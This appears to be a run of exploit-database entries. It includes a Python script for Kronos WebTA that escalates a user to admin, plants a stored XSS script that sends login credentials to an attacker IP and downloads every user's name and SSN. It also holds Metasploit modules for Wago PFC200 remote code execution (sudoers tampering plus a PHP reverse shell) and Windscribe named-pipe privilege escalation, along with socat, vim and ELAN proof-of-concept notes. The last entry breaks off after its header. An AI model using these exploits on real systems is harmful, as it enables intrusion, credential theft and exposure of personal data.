#  Exploit Title: Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation
#  Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group
#  Exploit Author: Nolan B. Kennedy (nxkennedy)
#  Discovery date: 2019-09-20
#  Vendor Homepage: https://www.kronos.com/products/kronos-webta
#  Version: 3.8.x - 4.0 affected. (Exploit tested on v3.8.6.79029)
#  Tested on: Linux
#  CVE: (Remote Privesc) CVE-2020-8495 | (Stored XSS) CVE-2020-8493
#  Usage: python3 exploit.py http://target

#!/bin/bash/python3

###
# *Exploit requires credentials with Timekeeper or Supervisor privileges
#
# Exploit abuses delegation privs present in the WebTA "/servlet/com.threeis.webta.H491delegate"
# servlet. By specifying the "delegate" and "delegatorUserId" parameter an attacker can use an
# admin user id to delegate role 5 (aka admin privs) to any other known user id, including oneself.
#
# selFunc=add&selRow=&delegate=<ATTACKER>&delegateRole=5&delegatorEmpId=1234&delegatorUserId=<ADMIN>
#
# With our new admin account, we can abuse a stored XSS vulnerability present in the login page,
# banner (displayed on every page) & password reset page. We can also pull system information and
# download a file containing the FULL NAME AND SSN OF EVERY USER in the database (typically thousands).
#
#
# Below is an example of the exploit output:
#####
# [+] Logged in as 'TESTER' with roles: Employee, Timekeeper
#
# [+] Available Admin Accounts:
# MOTOKO
# BATOU
# TOGUSA
# ISHIKAWA
#
# [-] Attempting to use account 'MOTOKO' to delegate Admin privs to 'TESTER'...
#
# [+] 'TESTER' successfully elevated to Admin privs :)
#
#
# [+] Logged in as 'TESTER' with roles: Employee, Timekeeper, Admin
#
# [+] Webta Version Information
# Site parameter: company
# Licensed modules:WEBTA-LEAVE, WEBTA, WEBTA
# webTA Servlet Version: 3.8.6.79029
# webTA Database Version: 3.8.6.79029
# App Server OS: Linux version 3.10.0-1062.1.1.el7.x86_64 (amd64)
# App Server JDK Version: Oracle Corporation version 1.8.0_222
# App Server Servlet Engine: Apache Tomcat/7.0.76 (Servlet API 3.0)
# App Server JDBC Driver: Oracle JDBC driver version 11.2.0.4.0
# Database Version:  Oracle JDBC driver version 11.2.0.4.0
# Database Connection: jdbc:oracle:thin:@//foo.rds.amazonaws.com:1521/webtadb<br>connected as user WEBTASVC
#
# [-] Downloading names and SSNs...
#
# [+] Complete. 5020 users written to file 'WebTA-PII.xls'
# [+] Sample Content:
# USERID,Last Name,First Name,Middle Name,SSN,Supervisor ID,Timekeeper ID,Organization,Pay Period,Active Status,
# MOTOKO,Kusanagi,Major,M.,987-65-4321,ARAMAKI,ARAMAKI,SECTION9,19,Active,
#
# [+] Stored XSS attack complete :)
#####

import re
from requests import Request, Session
from sys import argv, exit




banner = """###
#  Kronos WebTA 3.8.x - 4.0 Authenticated Remote Privilege Escalation & Stored XSS Exploit
#  Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group
#  Exploit Author: Nolan B. Kennedy (nxkennedy)
#  Discovery date: 20 SEPT 2019
#  Vendor Homepage: https://www.kronos.com/products/kronos-webta
#  Version: 3.8.x - 4.0 affected. (Exploit tested on v3.8.6.79029)
#  Tested on: Linux
#  CVE: (Remote Privesc) CVE-2020-8494 | (Stored XSS) CVE-2020-8493
#  Usage: python3 exploit.py http://target
###"""
base_url = argv[1]
username = "TESTER"
password = "password!1234"
# set to True if you want to also exploit Stored XSS
xss = False
# xss strings can be injected into 3 different 'banner' locations (feel free to modify content)
# WILL NOT ERASE CONTENT ALREADY IN APPLICATION
xss_login_page = """
<script>
/* steals login creds each time a user logs in and forwards them to attacker ip */

var attacker = "192.168.1.3";

/* don't forget to set up a listener (python3 -m http.server 80) */
function stealCreds() {
        var username = document.frm[1].value;
        var password = document.frm[2].value;
        img = new Image();
        img.src = "http://"+attacker+"/?"+ "username=" +username+ "&" + "password=" +escape(password);
        setTimeout('document.frm.submit();', 1000);
        return false;
        }

function readyToSteal() {
  document.frm.onsubmit = stealCreds;
  }

/* special for WebTA because otherwise the script loads before the DOM and password form */
document.addEventListener("DOMContentLoaded", readyToSteal);
</script>
"""
xss_banner_everypage = ""
xss_passwordchange_page = ""
s = Session()
adm_list = []



def web_req(url, data):
  print()
  req = Request('POST', url, data=data)
  prepared = s.prepare_request(req)
  resp = s.send(prepared, allow_redirects=True, verify=False)
  return resp



def killActiveSession():
  url = base_url + "/servlet/com.threeis.webta.H111multipleLogin"
  data = {"selFunc":"continue"}
  resp = web_req(url, data)



def checkPrivs():
  url = base_url + "/servlet/com.threeis.webta.HGateway"
  data = {}
  resp = web_req(url, data)
  html = resp.text
  activeSession = roles = re.findall(r'(.*?)You have an active session open at a another browser(.*?)\.', html)
  roles = re.findall(r'(.*?)type\="button"(.*?)>', html)
  if activeSession:
    print("[-] Killing active session...")
    killActiveSession()
    login()
  elif roles:
    roles_list = []
    for role in roles:
      role = role[1].split('"')[1]
      roles_list.append(role)
    print("[+] Logged in as '{}' with roles: {}".format(username, ', '.join(roles_list)))

  else:
    print("[!] Account does not have required Timekeeper or Supervisor privs")
    exit()



def login():
  url = base_url + "/servlet/com.threeis.webta.H110login"
  data = {"j_username": username, "j_password": password, "login": "++Log+In++"}
  resp = web_req(url, data)
  if resp.status_code != 200:
    print("[!] Failed login in as '{}'".format(username))
    exit()
  checkPrivs()



def findAdmins():
  url = base_url + "/servlet/com.threeis.webta.H940searchUser"
  data = {
"selFunc":"search",
"return_page":"com.threeis.webta.P491delegate",
"return_variable":"delegate",
"search_org":"0",
"search_role":"Administrator",
"actingRole":"2",
"payload_name_0":"selFunc",
"payload_val_0":"search",
"payload_name_1":"selRow",
"payload_name_2":"delegate",
"payload_name_3":"delegateRole",
"payload_val_3":"2",
"payload_name_4":"delegatorEmpId",
"payload_val_4":"15667", # might need a valid user id
"payload_name_5":"delegatorUserId",
"payload_val_5":username,
        }
  resp = web_req(url, data)
  html = resp.text
  adm_usrs = re.findall(r'<TD CLASS\="bckGray">(.*?)\n', html)
  print("[+] Available Admin Accounts:")
  for snip in adm_usrs:
          adm = snip.split('</TD><TD CLASS="bckGray">')[2]
          adm_list.append(adm)
          print(adm)



def privesc():
  url = base_url + "/servlet/com.threeis.webta.H491delegate"
  data = {
"selFunc":"add",
"delegate":username,
"delegateRole":"5",
"delegatorEmpId":"1234",
"delegatorUserId":adm_list[0],
  }
  print()
  print("[-] Attempting to use account '{}' to delegate Admin privs to '{}'...".format(adm_list[0], username))
  resp = web_req(url, data)
  print("[+] '{}' successfully elevated to Admin privs :)".format(username))



def storeXSS():
  url = base_url + "/servlet/com.threeis.webta.H261configMenu"
  data = {'selFunc':'messages'}
  ### to be covert we want to append our js to the end of * messages/banners already there *
  resp = web_req(url, data)
  html = resp.text
  messages = re.findall(r'<TEXTAREA name\=(.*?)</textarea>', html, re.DOTALL)
  messages_clean = []
  for message in messages:
    message = message.split('wrap="virtual">')[1]
    messages_clean.append(message)
  login_page = messages_clean[0]
  banner_everypage = messages_clean[1]
  passwordchange_page = messages_clean[2]

  ###  now we inject our javascript
  url = base_url + "/servlet/com.threeis.webta.H201config"
  data = {
"selFunc":"save",
"loginMessage": login_page + xss_login_page,
"bannerMessage": banner_everypage + xss_banner_everypage,
"passwordMessage": passwordchange_page + xss_passwordchange_page,
  }
  resp = web_req(url, data)
  print("[+] Stored XSS attack complete :)")



def stealPII():
  url = base_url + "/servlet/com.threeis.webta.H287userRoleReport"
  data = {
"selFunc":"downloademp",
"roletype":"1",
"orgsel":"0",
"pageNum":"1",
  }
  print("[-] Downloading names and SSNs...")
  resp = web_req(url, data)
  filename = "WebTA-PII.xls"
  with open(filename, 'wb') as f:
    f.write(resp.content)
  with open(filename) as f:
    for i, l in enumerate(f):
      pass
  count = i # does not include header
  print("[+] Complete. {} users written to file '{}'".format(count, filename))
  print("[+] Sample Content:")
  with open(filename) as f:
    for n in range(2):
      print(",".join(f.readline().split("\t")), end="")



def dumpSysInfo():
  url = base_url + "/servlet/com.threeis.webta.H200mnuAdmin"
  data = {"selFunc":"about"}
  resp = web_req(url, data)
  html = resp.text
  data = re.findall(r'<INPUT VALUE\="(.*?)"', html, re.DOTALL)
  print("[+] " + data[0])



if __name__ == '__main__':
  print(banner)
  login()
  findAdmins()
  privesc()
  login() # login again because we need the refreshed perms after privesc
  dumpSysInfo()
  #stealPII()
  if xss:
    storeXSS()
  s.close()

# Exploit Title: Socat 1.7.3.4 - Heap Based Overflow (PoC)
# Date: 2020-02-03
# Exploit Author: hieubl from HPT Cyber Security
# Vendor Homepage: http://www.dest-unreach.org/
# Software Link: http://www.dest-unreach.org/socat/
# Version: 1.7.3.4
# Tested on: Ubuntu 16.04.6 LTS
# CVE :

# Heap-Based Overflow due to Integer Overflow and Lack of PIE mitigation (PoC)

------- [***Description***] -------
The source code of socat.c contains _socat() function which has the
Integer Overflow vulnerability:
int _socat(void) {
    ...
    unsigned char *buff;
    ...
    buff = Malloc(2*socat_opts.bufsiz+1)
    ...
}

After that, the the line of code "if ((bytes2 = xiotransfer(sock2,
sock1, &buff, socat_opts.bufsiz, true)) < 0) {" calls the
xiotransfer() function. The xiotransfer() function calls xioread()
function. Finally xioread() function calls Read() function.

ssize_t xioread(xiofile_t *file, void *buff, size_t bufsiz) {

    ...
    Read(pipe->fd, buff, bufsiz); //[***!!!This line of code leads to
Heap-Based Overflow vulnerability***!!!]
    ...
}

In addition, the "Makefile" file does not turn on the Position
Independent Executables (PIE) mitigation (the CFLAGS does not contains
"-pie" flag). By default, Ubuntu 16.04 does not turn on this
mitigation. Consequently, it is easier to exploit the program, may
even lead to Remode Code Execution (RCE).
Reference: https://hackerone.com/reports/415272, $100 bounty for Linux
Desktop application slack executable does not use pie / no ASLR

------- [***Download and build***] -------
Download link: http://www.dest-unreach.org/socat/download/socat-1.7.3.4.tar.gz
$ tar xzvf socat-1.7.3.4.tar.gz
$ cd socat-1.7.3.4/
$ ./configure
Modify "Makefile" file: "CFLAGS = -g -O -D_GNU_SOURCE -Wall
-Wno-parentheses $(CCOPTS) $(DEFS) $(CPPFLAGS)" (add "-g" flag for
debugging purpose)
$ make
$ sudo make install

------- [***Proof of Concept***] -------
$ checksec socat
[*] '/home/natsu/temp/socat-1.7.3.4/socat'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    FORTIFY:  Enabled
>>> There is no PIE mitigation!

$ python -c 'print "A"*1000000'> a
$ touch b
$ socat -b9223372036854775888 OPEN:a,readbytes=1000000 OPEN:b,readbytes=1000000

This proof of concept triggers the bugs by setting the buffer size to
0x8000000000000050(9223372036854775888 in decimal). Therefore, the malloc
size is passed to "Malloc(2*socat_opts.bufsiz+1)" is 0x100000000000000a0.
This is equivalent to Malloc(0xa0). The readbytes("readbytes=1000000")
controls the size of reading (we cannot read with the size too large as
0x8000000000000050) with these lines of code: if (pipe->readbytes) { if
(pipe->actbytes == 0) { return 0; } if (pipe->actbytes < bufsiz) { bufsiz =
pipe->actbytes; } } ------- [***Crash logs***] ------- *** Error in
`socat': free(): invalid next size (normal): 0x000000000106a110 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc0ee5817e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc0ee58a37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc0ee58e53c]
socat[0x407e3f]
socat[0x4084c6]
socat[0x408f7a]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc0ee52a830]
socat[0x4057a9]
======= Memory map: ========
00400000-0044a000 r-xp 00000000 08:01 655643
/usr/local/bin/socat
00649000-0064a000 r--p 00049000 08:01 655643
/usr/local/bin/socat
0064a000-0064b000 rw-p 0004a000 08:01 655643
/usr/local/bin/socat
0064b000-0068c000 rw-p 00000000 00:00 0
01069000-0108a000 rw-p 00000000 00:00 0
 [heap]
7fc0e8000000-7fc0e8021000 rw-p 00000000 00:00 0
7fc0e8021000-7fc0ec000000 ---p 00000000 00:00 0
7fc0eded3000-7fc0edee9000 r-xp 00000000 08:01 397801
/lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0edee9000-7fc0ee0e8000 ---p 00016000 08:01 397801
/lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0ee0e8000-7fc0ee0e9000 rw-p 00015000 08:01 397801
/lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0ee0e9000-7fc0ee0ec000 r-xp 00000000 08:01 397787
/lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee0ec000-7fc0ee2eb000 ---p 00003000 08:01 397787
/lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2eb000-7fc0ee2ec000 r--p 00002000 08:01 397787
/lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2ec000-7fc0ee2ed000 rw-p 00003000 08:01 397787
/lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2ed000-7fc0ee305000 r-xp 00000000 08:01 397909
/lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee305000-7fc0ee504000 ---p 00018000 08:01 397909
/lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee504000-7fc0ee505000 r--p 00017000 08:01 397909
/lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee505000-7fc0ee506000 rw-p 00018000 08:01 397909
/lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee506000-7fc0ee50a000 rw-p 00000000 00:00 0
7fc0ee50a000-7fc0ee6ca000 r-xp 00000000 08:01 397763
/lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee6ca000-7fc0ee8ca000 ---p 001c0000 08:01 397763
/lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8ca000-7fc0ee8ce000 r--p 001c0000 08:01 397763
/lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8ce000-7fc0ee8d0000 rw-p 001c4000 08:01 397763
/lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8d0000-7fc0ee8d4000 rw-p 00000000 00:00 0
7fc0ee8d4000-7fc0eeaef000 r-xp 00000000 08:01 397619
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eeaef000-7fc0eecee000 ---p 0021b000 08:01 397619
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eecee000-7fc0eed0a000 r--p 0021a000 08:01 397619
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eed0a000-7fc0eed16000 rw-p 00236000 08:01 397619
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eed16000-7fc0eed19000 rw-p 00000000 00:00 0
7fc0eed19000-7fc0eed77000 r-xp 00000000 08:01 397620
/lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eed77000-7fc0eef77000 ---p 0005e000 08:01 397620
/lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef77000-7fc0eef7b000 r--p 0005e000 08:01 397620
/lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef7b000-7fc0eef82000 rw-p 00062000 08:01 397620
/lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef82000-7fc0eef84000 r-xp 00000000 08:01 397944
/lib/x86_64-linux-gnu/libutil-2.23.so
7fc0eef84000-7fc0ef183000 ---p 00002000 08:01 397944
/lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef183000-7fc0ef184000 r--p 00001000 08:01 397944
/lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef184000-7fc0ef185000 rw-p 00002000 08:01 397944
/lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef185000-7fc0ef18c000 r-xp 00000000 08:01 397917
/lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef18c000-7fc0ef38b000 ---p 00007000 08:01 397917
/lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38b000-7fc0ef38c000 r--p 00006000 08:01 397917
/lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38c000-7fc0ef38d000 rw-p 00007000 08:01 397917
/lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38d000-7fc0ef3b3000 r-xp 00000000 08:01 397735
/lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef594000-7fc0ef59a000 rw-p 00000000 00:00 0
7fc0ef5b1000-7fc0ef5b2000 rw-p 00000000 00:00 0
7fc0ef5b2000-7fc0ef5b3000 r--p 00025000 08:01 397735
/lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef5b3000-7fc0ef5b4000 rw-p 00026000 08:01 397735
/lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef5b4000-7fc0ef5b5000 rw-p 00000000 00:00 0
7ffe11dd9000-7ffe11dfa000 rw-p 00000000 00:00 0
 [stack]
7ffe11dfb000-7ffe11dfe000 r--p 00000000 00:00 0
 [vvar]
7ffe11dfe000-7ffe11e00000 r-xp 00000000 00:00 0
 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0
 [vsyscall]
2020/02/04 05:33:00 socat[47233] E exiting on signal 6

# Exploit Title: Wago PFC200 - Authenticated Remote Code Execution (Metasploit)
# Date: 2020-02-05
# Exploit Author: Nico Jansen (0x483d)
# Vendor Homepage: https://www.wago.com/
# Version: <= Firmare 11 (02_08_35)
# Tested on: Linux
# CVE : N/A

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'

class MetasploitModule < Msf::Exploit::Remote
  #Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
'Name'        => 'Wago PFC200 authenticated remote code execution',
'Description' => %q{
        The Wago PFC200 (up to incl. Firmware 11 02_08_35) is vulnerable to an authenticated remote code execution in the
        administrative web interface. By exploiting the vulnerability, an attacker is able to run system commands in root context.
        To execute this module, login credenials of the website administrator are required (default: admin/wago).
        This module was tested against a Wago 750-8202 Firmware 11 (02_08_35) but other PFC200 models may be affected as well.
      },
'Author' =>
        [
'Nico Jansen (0x483d)' # Vulnerability discovery and MSF module
        ],
'License' => MSF_LICENSE,
'Platform' => 'php',
'References' =>
        [
          ['CVE', '-'],
          ['US-CERT-VU', '-'],
          ['URL', '-'],
          ['URL', '-']
        ],
'DisclosureDate' => 'Aug 1 2018',
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'SSL' => true,
      },
'Targets' => [
        ['Automatic', {}]
      ],
'DefaultTarget'   => 0))

      register_options(
        [
          Opt::RPORT(443),
          OptString.new('ADMINPASSWORD', [true, 'Password to authenticate as admin', 'wago']),
        ])

        deregister_options('VHOST')
  end

  # This function checks the index page to check if it may be a valid device.
  # There are some more checks done after an successful authentication
  def check
    @csrf=""
    res = send_request_cgi(
'method' => 'GET',
'uri' => '/wbm/index.php'
    )

    if res && res.code == 200 && res.body.to_s =~ /WAGO Ethernet Web-based Management/
      result = sendConfigToolMessage("get_typelabel_value", ["SYSDESC"])
      if result and result =~ /PFC200/
        # Get Version and check if it's <= 11
        result = sendConfigToolMessage("get_coupler_details", ["firmware-revision"])
        result = result.split('(')[1]
        result = result.split(')')[0]
        if Integer(result) <= 11
          return Exploit::CheckCode::Vulnerable
        else
          return Exploit::CheckCode::Safe
        end
      end
      return Exploit::CheckCode::Safe
    end
    return Exploit::CheckCode::Safe
  end

  # This function authenticates the adminuser against the Wago PLC
  def login
    res = send_request_cgi(
'method' => 'POST',
'uri' => '/wbm/login.php',
'data' => '{"username":"admin","password":"' + datastore['ADMINPASSWORD'] + '"}'
    )
    if res.code != 200
      return false
    end

    parsed_json = JSON.parse(res.body.to_s)
    if parsed_json["status"] == 0
      @cookie = res.get_cookies
      @csrf = parsed_json["csrfToken"]
      return true
    else
      return false
    end
  end

  # This function can be used to execute arbitary commands after login
  def sendConfigToolMessage(scriptname, parameters, expectResponse=true)
    parameterString = ''
    for param in parameters
      parameterString = parameterString + '"' + param + '", '
    end

    parameterString = parameterString[0...-2]
    request ='{"csrfToken":"' + @csrf + '",'\
'"renewSession":true,"aDeviceParams":{"0"'\
':{"name":"' + scriptname + '","parameter":['\
      + parameterString + '],"sudo":true,"multiline":false,'\
'"timeout":12000,"dataId":0}}}'

    res = send_request_cgi(
'method' => 'POST',
'uri' => '/wbm/configtools.php',
'data' => request,
'cookie' => @cookie,
    )
    # After exploitation, there is no response, so just return true because the message was sent
    if expectResponse == false
      return true
    end

    parsed_json = JSON.parse(res.body.to_s)
    @csrf = parsed_json["csrfToken"]
    if parsed_json["aDeviceResponse"][0]["status"] == 0
      return parsed_json["aDeviceResponse"][0]["resultString"]
    else
      return false
    end
  end

  # This function is used to enable php execution in sudoers file using sed
  def change_sudo_permissions()
    return sendConfigToolMessage('/../../../usr/bin/sed',["-i", "s/NOPASSWD:/NOPASSWD:ALL#/", "/etc/sudoers"])
  end

  # Encode a given string to bypass validation
  def encode(content)
    result = ""
    content.split("").each do |i|
      result = result + "chr(" + (i.ord).to_s + ")."
    end
    result = result[0...-1]
    return result
  end

  # This function generates the required payload used to connect to the msf listener
  def send_payload()
    meterpreter_reverse_php='exec("/usr/bin/sed -i \'s/NOPASSWD:ALL#/NOPASSWD:/\' \'/etc/sudoers\'"); $ip = "' + datastore['LHOST'] + '"; $port = ' + datastore['LPORT'].to_s + '; '\
'if (($f = "stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); '\
'$s_type = "stream"; } if (!$s && ($f = "fsockopen") && is_callable($f)) { $s = $f($ip, $port);'\
' $s_type = "stream"; } if (!$s && ($f = "socket_create") && is_callable($f)) '\
'{ $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) '\
'{ die(); } $s_type = "socket"; } if (!$s_type) { die("no socket funcs"); } '\
'if (!$s) { die("no socket"); } switch ($s_type) { case "stream": $len = fread($s, 4); break; '\
'case "socket": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len);'\
' $len = $a["len"]; $b = ""; while (strlen($b) < $len) { switch ($s_type) { case "stream": $b .= '\
'fread($s, $len-strlen($b)); break; case "socket": $b .= socket_read($s, $len-strlen($b)); break; } } '\
'$GLOBALS["msgsock"] = $s; $GLOBALS["msgsock_type"] = $s_type; if (extension_loaded("suhosin") '\
'&& ini_get("suhosin.executor.disable_eval")) { $suhosin_bypass=create_function("", $b); $suhosin_bypass(); } '\
'else { eval($b); } die(); ?>'

    command = "eval(" + encode(meterpreter_reverse_php) + ");"
    return sendConfigToolMessage("/../../../usr/bin/php5", ["-r", command], false)
  end

  def exploit
    if check == Exploit::CheckCode::Vulnerable # Check if the system may be a PFC200
      print_good("Target seems to be a vulnerable PFC200 device")
      if login # Try to authenticate using the given credentials
        print_good("Successfully logged in as website admin")
        if change_sudo_permissions()
          print_good("Manipulated the /etc/sudoers file to enable php execution as root")
          print_good("Preparing meterpreter payload and undoing changes to /etc/sudoers...")
          send_payload()
        else
          print_error("Unable to modify the /etc/sudoers file...")
        end
      else
        print_error("Unable to login as admin with the given credentials...")
      end
    else
      print_error("Target is not a valid PFC200 device. Will exit now...")
    end
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::EXE
  include Post::File
  include Post::Windows::Priv
  include Post::Windows::Services
  include Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Windscribe WindscribeService Named Pipe Privilege Escalation',
'Description'    => %q{
        The Windscribe VPN client application for Windows makes use of a
        Windows service `WindscribeService.exe` which exposes a named pipe
        `\\.\pipe\WindscribeService` allowing execution of programs with
        elevated privileges.

        Windscribe versions prior to 1.82 do not validate user-supplied
        program names, allowing execution of arbitrary commands as SYSTEM.

        This module has been tested successfully on Windscribe versions
        1.80 and 1.81 on Windows 7 SP1 (x64).
      },
'License'        => MSF_LICENSE,
'Author'         =>
      [
'Emin Ghuliev', # Discovery and exploit
'bcoles'        # Metasploit
      ],
'References'     =>
        [
          ['CVE', '2018-11479'],
          ['URL', 'http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html'],
          ['URL', 'https://pastebin.com/eLG3dpYK']
        ],
'Platform'       => ['win'],
'SessionTypes'   => ['meterpreter'],
'Targets'        => [['Automatic', {}]],
'DisclosureDate' => '2018-05-24',
'DefaultOptions' =>
        {
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
        },
'Notes'          =>
        {
'Reliability' => [ REPEATABLE_SESSION ],
'Stability'   => [ CRASH_SAFE ]
        },
'DefaultTarget'  => 0))
    register_advanced_options [
      OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]),
    ]
  end

  def base_dir
    datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s
  end

  def service_exists?(service)
    srv_info = service_info(service)

    if srv_info.nil?
      vprint_warning 'Unable to enumerate Windows services'
      return false
    end

    if srv_info && srv_info[:display].empty?
      return false
    end

    true
  end

  def write_named_pipe(pipe, command)
    kt = "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    kt << "\x00\x00\x00\x00"
    kt << [command.force_encoding('UTF-8').codepoints.map { |c| "%04X" % c }.join].pack('H*')
    kt << "\x00" * (32_005 - kt.length)

    print_status "Sending #{command} to #{pipe} ..."

    r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0, nil, 'OPEN_EXISTING', 0, nil)
    handle = r['return']

    if handle == 0xffffffff # INVALID_HANDLE_VALUE
      print_error "Invalid handle. #{pipe} named pipe not found, or already opened"
      return false
    end

    vprint_good("Opended #{pipe}! Proceeding ...")

    begin
      w = client.railgun.kernel32.WriteFile(handle, kt, kt.length, 4, nil)
      if w['return'] == false
        return false
      end
    ensure
      session.railgun.kernel32.CloseHandle(handle)
    end

    true
  rescue
    false
  end

  def check
    service = 'WindscribeService'

    unless service_exists? service
      return CheckCode::Safe("Service '#{service}' does not exist")
    end

    CheckCode::Detected
  end

  def exploit
    unless check == CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if is_system?
      fail_with Failure::BadConfig, 'Session already has SYSTEM privileges'
    end

    payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe"
    payload_exe = generate_payload_exe
    vprint_status "Writing payload (#{payload.encoded.length} bytes) to #{payload_path} ..."
    write_file payload_path, payload_exe
    register_file_for_cleanup payload_path

    unless write_named_pipe("\\\\.\\pipe\\WindscribeService", payload_path)
      fail_with Failure::Unknown, 'Failed to write to pipe'
    end
  end
end

#Exploit Title: ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2020-02-05
#Vendor : ELAN Microelectronics
#Vendor Homepage : http://www.emc.com.tw/
#Tested on OS: Windows 10 v1803


#Analyze PoC :
==============


C:\Users\ZwX>sc qc ETDService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: ETDService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Elantech\ETDService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Elan Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit Title: Invalid memory access with search command
# Date: 17-12-2019
# Vulnerability: DoS
# Vulnerability Discovery: Dhiraj Mishra
# Vulnerable Version: VIM - Vi IMproved 8.2 (Included patches: 1-131)
# Vendor Homepage: https://www.vim.org/
# References:
https://github.com/vim/vim/commit/98a336dd497d3422e7efeef9f24cc9e25aeb8a49

PoC: vim --clean -e -s -c 'exe "norm /\x80PS"'

# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
